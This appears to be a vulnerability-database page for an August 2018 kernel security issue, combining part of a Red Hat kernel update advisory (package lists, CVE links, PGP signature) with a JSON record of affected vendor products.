x86_64: kernel-3.10.0-862.11.6.el7.x86_64.rpm kernel-debug-3.10.0-862.11.6.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-debug-devel-3.10.0-862.11.6.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.11.6.el7.x86_64.rpm kernel-devel-3.10.0-862.11.6.el7.x86_64.rpm kernel-headers-3.10.0-862.11.6.el7.x86_64.rpm kernel-tools-3.10.0-862.11.6.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-tools-libs-3.10.0-862.11.6.el7.x86_64.rpm perf-3.10.0-862.11.6.el7.x86_64.rpm perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm python-perf-3.10.0-862.11.6.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64: kernel-debug-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.11.6.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-862.11.6.el7.x86_64.rpm perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: kernel-3.10.0-862.11.6.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-862.11.6.el7.noarch.rpm kernel-doc-3.10.0-862.11.6.el7.noarch.rpm

x86_64: kernel-3.10.0-862.11.6.el7.x86_64.rpm kernel-debug-3.10.0-862.11.6.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-debug-devel-3.10.0-862.11.6.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.11.6.el7.x86_64.rpm kernel-devel-3.10.0-862.11.6.el7.x86_64.rpm kernel-headers-3.10.0-862.11.6.el7.x86_64.rpm kernel-tools-3.10.0-862.11.6.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-tools-libs-3.10.0-862.11.6.el7.x86_64.rpm perf-3.10.0-862.11.6.el7.x86_64.rpm perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm python-perf-3.10.0-862.11.6.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64: kernel-debug-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.11.6.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-862.11.6.el7.x86_64.rpm perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: kernel-3.10.0-862.11.6.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-862.11.6.el7.noarch.rpm kernel-doc-3.10.0-862.11.6.el7.noarch.rpm

ppc64: kernel-3.10.0-862.11.6.el7.ppc64.rpm kernel-bootwrapper-3.10.0-862.11.6.el7.ppc64.rpm kernel-debug-3.10.0-862.11.6.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-862.11.6.el7.ppc64.rpm kernel-debug-devel-3.10.0-862.11.6.el7.ppc64.rpm kernel-debuginfo-3.10.0-862.11.6.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-862.11.6.el7.ppc64.rpm kernel-devel-3.10.0-862.11.6.el7.ppc64.rpm kernel-headers-3.10.0-862.11.6.el7.ppc64.rpm kernel-tools-3.10.0-862.11.6.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-862.11.6.el7.ppc64.rpm kernel-tools-libs-3.10.0-862.11.6.el7.ppc64.rpm perf-3.10.0-862.11.6.el7.ppc64.rpm perf-debuginfo-3.10.0-862.11.6.el7.ppc64.rpm python-perf-3.10.0-862.11.6.el7.ppc64.rpm python-perf-debuginfo-3.10.0-862.11.6.el7.ppc64.rpm

ppc64le: kernel-3.10.0-862.11.6.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-862.11.6.el7.ppc64le.rpm kernel-debug-3.10.0-862.11.6.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm kernel-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-862.11.6.el7.ppc64le.rpm kernel-devel-3.10.0-862.11.6.el7.ppc64le.rpm kernel-headers-3.10.0-862.11.6.el7.ppc64le.rpm kernel-tools-3.10.0-862.11.6.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm kernel-tools-libs-3.10.0-862.11.6.el7.ppc64le.rpm perf-3.10.0-862.11.6.el7.ppc64le.rpm perf-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm python-perf-3.10.0-862.11.6.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm

s390x: kernel-3.10.0-862.11.6.el7.s390x.rpm kernel-debug-3.10.0-862.11.6.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-862.11.6.el7.s390x.rpm kernel-debug-devel-3.10.0-862.11.6.el7.s390x.rpm kernel-debuginfo-3.10.0-862.11.6.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-862.11.6.el7.s390x.rpm kernel-devel-3.10.0-862.11.6.el7.s390x.rpm kernel-headers-3.10.0-862.11.6.el7.s390x.rpm kernel-kdump-3.10.0-862.11.6.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-862.11.6.el7.s390x.rpm kernel-kdump-devel-3.10.0-862.11.6.el7.s390x.rpm perf-3.10.0-862.11.6.el7.s390x.rpm perf-debuginfo-3.10.0-862.11.6.el7.s390x.rpm python-perf-3.10.0-862.11.6.el7.s390x.rpm python-perf-debuginfo-3.10.0-862.11.6.el7.s390x.rpm

x86_64: kernel-3.10.0-862.11.6.el7.x86_64.rpm kernel-debug-3.10.0-862.11.6.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-debug-devel-3.10.0-862.11.6.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.11.6.el7.x86_64.rpm kernel-devel-3.10.0-862.11.6.el7.x86_64.rpm kernel-headers-3.10.0-862.11.6.el7.x86_64.rpm kernel-tools-3.10.0-862.11.6.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-tools-libs-3.10.0-862.11.6.el7.x86_64.rpm perf-3.10.0-862.11.6.el7.x86_64.rpm perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm python-perf-3.10.0-862.11.6.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm

Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7):

noarch: kernel-abi-whitelists-3.10.0-862.11.6.el7.noarch.rpm kernel-doc-3.10.0-862.11.6.el7.noarch.rpm

ppc64le: kernel-3.10.0-862.11.6.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-862.11.6.el7.ppc64le.rpm kernel-debug-3.10.0-862.11.6.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm kernel-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-862.11.6.el7.ppc64le.rpm kernel-devel-3.10.0-862.11.6.el7.ppc64le.rpm kernel-headers-3.10.0-862.11.6.el7.ppc64le.rpm kernel-tools-3.10.0-862.11.6.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm kernel-tools-libs-3.10.0-862.11.6.el7.ppc64le.rpm perf-3.10.0-862.11.6.el7.ppc64le.rpm perf-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm python-perf-3.10.0-862.11.6.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm

s390x: kernel-3.10.0-862.11.6.el7.s390x.rpm kernel-debug-3.10.0-862.11.6.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-862.11.6.el7.s390x.rpm kernel-debug-devel-3.10.0-862.11.6.el7.s390x.rpm kernel-debuginfo-3.10.0-862.11.6.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-862.11.6.el7.s390x.rpm kernel-devel-3.10.0-862.11.6.el7.s390x.rpm kernel-headers-3.10.0-862.11.6.el7.s390x.rpm kernel-kdump-3.10.0-862.11.6.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-862.11.6.el7.s390x.rpm kernel-kdump-devel-3.10.0-862.11.6.el7.s390x.rpm perf-3.10.0-862.11.6.el7.s390x.rpm perf-debuginfo-3.10.0-862.11.6.el7.s390x.rpm python-perf-3.10.0-862.11.6.el7.s390x.rpm python-perf-debuginfo-3.10.0-862.11.6.el7.s390x.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64: kernel-debug-debuginfo-3.10.0-862.11.6.el7.ppc64.rpm kernel-debuginfo-3.10.0-862.11.6.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-862.11.6.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-862.11.6.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-862.11.6.el7.ppc64.rpm perf-debuginfo-3.10.0-862.11.6.el7.ppc64.rpm python-perf-debuginfo-3.10.0-862.11.6.el7.ppc64.rpm

ppc64le: kernel-debug-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm kernel-debug-devel-3.10.0-862.11.6.el7.ppc64le.rpm kernel-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-862.11.6.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-862.11.6.el7.ppc64le.rpm perf-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm

x86_64: kernel-debug-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.11.6.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-862.11.6.el7.x86_64.rpm perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm

Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7):

noarch: kernel-doc-3.10.0-862.11.6.el7.noarch.rpm

ppc64le: kernel-debug-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm kernel-debug-devel-3.10.0-862.11.6.el7.ppc64le.rpm kernel-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-862.11.6.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-862.11.6.el7.ppc64le.rpm perf-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: kernel-3.10.0-862.11.6.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-862.11.6.el7.noarch.rpm kernel-doc-3.10.0-862.11.6.el7.noarch.rpm

x86_64: kernel-3.10.0-862.11.6.el7.x86_64.rpm kernel-debug-3.10.0-862.11.6.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-debug-devel-3.10.0-862.11.6.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.11.6.el7.x86_64.rpm kernel-devel-3.10.0-862.11.6.el7.x86_64.rpm kernel-headers-3.10.0-862.11.6.el7.x86_64.rpm kernel-tools-3.10.0-862.11.6.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-tools-libs-3.10.0-862.11.6.el7.x86_64.rpm perf-3.10.0-862.11.6.el7.x86_64.rpm perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm python-perf-3.10.0-862.11.6.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64: kernel-debug-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.11.6.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-862.11.6.el7.x86_64.rpm perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2017-13215 https://access.redhat.com/security/cve/CVE-2018-3620 https://access.redhat.com/security/cve/CVE-2018-3646 https://access.redhat.com/security/cve/CVE-2018-3693 https://access.redhat.com/security/cve/CVE-2018-5390 https://access.redhat.com/security/cve/CVE-2018-7566 https://access.redhat.com/security/cve/CVE-2018-10675 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/L1TF https://access.redhat.com/articles/3527791

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2018 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBW3MjONzjgjWX9erEAQioYA/9Ge//K50oCrGaDEMuI2PHYLcztiZt9meh C578LP6sC/HT17VAbV8C+Tvy9QBCU80t4mGU4GOPu8Q5HzZQv45n0NtdRTGCC+yb A1bFcf0vhXIALNsuDEZN9g5SwUBapxkRoh43R+E7ITCQWp0XIPaSjYgGNqpTTuD/ lxRCzc10HhxW+pUY+ERFcK6c0poc14FtSqM3GqZe10FhkykdIlmngFjkthjzefXO dUkYDy53G+iAdTrVFI03h3Wt+UBMmNwKtu8ydqtAxZ0zDZIP5ijASOtM4mlf77ec VsNn7OWythkpTcpa+Sh5+dk6DK+lU2vziVsEocYNpzB+T/aHC9n/+I8ibfp3B4DC k4lYqZJQDFR2jVABjkOVS9dWFlOYKFmU2JBwsqdRvt3rgVFXEH3n5OQydHGFskmP NFwDbRAFlwo3zjd9KuiQzdFTOensc35+eSHykY8nxY2hGMH5gGccShFL4C7N2mtx s8JnzA/Zj00VHMg8qIHGfQ7RSd/xyEJ5vn87WZcTshTNli6x1/0VnzpTKG85Ga+K S2EJDXFP9LqCT98TL1RDJmCTtfDjU3I/gbgu5xFaofQZfV48qAUomUQ2E+MhQAOX eBr/OvlfFP8HEwVEJBDtXKxxs1LgmjTSqOtfP8AvS5zI9/Y6o56i0d7Ng1CcaGKP lZgWJhC3Yik=i4St -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . 7.3) - ppc64, ppc64le, x86_64

  1. Consequently, the node was not available. This update fixes an irq latency source in memory compaction. As a result, nodes no longer get into "NodeNotReady" state under the described circumstances. (BZ#1596281)

  2. Previously, the kernel source code was missing support to report the Speculative Store Bypass Disable (SSBD) vulnerability status on IBM Power Systems and the little-endian variants of IBM Power Systems. As a consequence, the /sys/devices/system/cpu/vulnerabilities/spec_store_bypass file incorrectly reported "Not affected" on both CPU architectures. This fix updates the kernel source code to properly report the SSBD status either as "Vulnerable" or "Mitigation: Kernel entry/exit barrier (TYPE)" where TYPE is one of "eieio", "hwsync", "fallback", or "unknown". As a consequence, the VMs sometimes became unresponsive when booting. This update applies an upstream patch to avoid early microcode update when running under a hypervisor. As a result, kernel hangs no longer occur in the described scenario. (BZ#1618388)

4

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201808-1002",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "expressway",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "x8.11"
      },
      {
        "model": "collaboration meeting rooms",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "1.0"
      },
      {
        "model": "telepresence conductor",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "xc4.3.3"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "expressway series",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.5"
      },
      {
        "model": "telepresence conductor",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "xc4.3.1"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.7"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "traffix systems signaling delivery controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "5.0.0"
      },
      {
        "model": "big-ip domain name system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "digital network architecture center",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "1.2"
      },
      {
        "model": "big-ip application security manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "telepresence video communication server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "x8.11"
      },
      {
        "model": "virtualization",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "model": "aruba airwave amp",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "hp",
        "version": "8.2.7.1"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "expressway",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "x8.10.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "aruba clearpass policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "hp",
        "version": "6.6.0"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "advanced core operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "a10networks",
        "version": "4.1.4"
      },
      {
        "model": "expressway",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "x8.10.3"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "expressway",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "x8.10.4"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "aruba clearpass policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "hp",
        "version": "6.7.5"
      },
      {
        "model": "threat grid-cloud",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "telepresence conductor",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "xc4.3.2"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "traffix systems signaling delivery controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.4.0"
      },
      {
        "model": "webex hybrid data security",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.6"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "telepresence video communication server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "x8.10.1"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.18"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lte",
